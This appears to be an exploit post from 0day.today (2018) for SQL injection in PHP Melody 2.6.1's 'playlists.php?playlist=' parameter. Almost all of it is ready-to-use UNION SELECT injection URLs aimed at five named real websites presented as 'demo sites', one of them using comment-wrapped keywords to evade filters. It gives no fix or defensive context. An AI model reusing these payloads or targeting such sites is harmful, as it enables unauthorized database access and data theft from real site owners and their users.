PHP Melody 2.6.1 SQL Injection Vulnerability

---------------------------------------------------
PHP Melody 2.6.1 SQL Injection
---------------------------------------------------
 ###################################################
 [+] Author        :  Venkat Rajgor
 [+] Email         :  [email protected]
 [+] Vulnerability :  SQL injection
 ###################################################

---------info Cms----------------
name     : PHP Melody version 2.6.1
email    : [email protected]
dowloand : http://www.phpsugar.com
web      : http://www.phpsugar.com
price    : $39 USD

Vulnerable parameter:  playlists.php?playlist='

Demo Sites:

[+] http://www.donlugo.tv/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.businessfight.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.salsamalsa.com/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.mathstube.org.uk/playlists.php?playlist=-1276' UNION SELECT
null,concat(0x223c2f613e3c2f6469763e3c2f6469763e,version(),0x3c212d2d),
null,null,null,null,null,null,null,null,null-- -

[+] http://www.hahuvideos.info/playlists.php?playlist=-1276'
/*!00000UNION*/ /*!00000SELECT*/ null,concat+(0x223c2f613e3c2f6469763e3c2f64
69763e,version(),0x3c212d2d),null,null,null,null,null,

#  0day.today [2018-03-16]  #